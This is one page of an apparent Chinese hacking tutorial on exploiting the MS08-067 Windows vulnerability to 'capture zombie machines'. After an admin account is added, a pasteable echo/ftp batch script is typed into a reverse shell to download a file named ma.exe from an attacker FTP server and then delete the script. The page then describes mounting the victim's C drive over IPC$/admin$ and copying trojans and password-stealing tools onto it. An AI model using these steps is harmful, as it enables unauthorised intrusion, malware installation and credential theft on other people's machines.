WEB开发网
开发学院网络安全安全技术 利用MS08067远程溢出漏洞抓肉鸡 阅读

利用MS08067远程溢出漏洞抓肉鸡

 2008-12-02 13:34:46 来源:WEB开发网   
核心提示: 图5 添加一个用户到管理员组中7.上传文件关于上传文件有多种方法,个人推荐ftp脚本法,利用MS08067远程溢出漏洞抓肉鸡(4),即在某一个站点或者自己假设一个临时Ftp服务器,然后使用以下样本下载ma.exe:echo open 218.*.*.* >b echo ftp>

利用MS08067远程溢出漏洞抓肉鸡

图5 添加一个用户到管理员组中

7.上传文件

关于上传文件有多种方法,个人推荐ftp脚本法,即在某一个站点或者自己假设一个临时Ftp服务器,然后使用以下样本下载ma.exe:

echo open 218.*.*.* >b

echo ftp>>b

echo ftp>>b

echo bin>>b

echo get ma.exe>>b

echo bye>>b

ftp -s:b

del b

将以上脚本在反弹的shell中直接粘贴即可从Ftp服务器上下载,然后可以在反弹的Shell中执行下载的文件。在本次渗透过程中,由于是相邻IP,因此使用了一个简便的方法,即单击“开始”-“运行”,在其中输入“IPadmin$”或者“IPC$”并确定,如图6所示,如图能够连接,则会出现一个输入网络密码的提示框,在用户和密码中分别输入刚才添加的用户名。

利用MS08067远程溢出漏洞抓肉鸡

图6打开网络连接

如果验证正确,则可以像使用资源管理器一样使用被溢出计算机所建立的磁盘连接,如图7所示,顺利打开该服务器上的C盘,然后将木马、获取系统密码、查看系统信息等工具软件直接复制过去即可。

利用MS08067远程溢出漏洞抓肉鸡

图7打开被溢出服务器系统盘

8.获取系统详细信息以及执行各种命令

上一页  1 2 3 4 5 6 7  下一页

Tags:利用 MS 远程

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接